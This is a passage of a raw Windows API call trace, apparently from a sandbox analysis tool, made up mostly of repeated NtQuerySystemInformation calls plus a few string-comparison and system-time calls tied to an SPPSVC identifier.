Length=0x20, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0272.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0272.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0272.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0272.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0272.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0272.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0272.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0272.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0272.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0272.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0272.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0272.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0272.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.419] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc18, Length=0x50, ResultLength=0x0) [0272.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0272.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0272.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0272.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0272.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0272.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcea0, Length=0x28, ResultLength=0x0) [0272.430] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0272.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0272.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0272.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.430] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0272.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0272.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0272.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0272.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x28, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x28, ResultLength=0x0) [0272.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x28, ResultLength=0x0) [0272.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0272.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x20, ResultLength=0x0) [0272.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x20, ResultLength=0x0) [0272.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x20, ResultLength=0x0) [0272.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x20, ResultLength=0x0) [0272.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0272.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x20, ResultLength=0x0) [0272.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0272.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0272.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.445] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fce70 | out: lpSystemTimeAsFileTime=0xf7a68fce70*(dwLowDateTime=0x34c06c65, dwHighDateTime=0x1d63874)) [0272.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0272.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x28, ResultLength=0x0) [0272.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd78, Length=0x50, ResultLength=0x0) [0272.445] GetTickCount () returned 0x118443a [0272.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc48, Length=0x58, ResultLength=0x0) [0272.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0272.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0272.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0272.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0272.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0272.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0272.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0272.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0272.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0272.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0272.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0272.457] NtQuerySystemInformation (SystemInformationClass=0xb9, 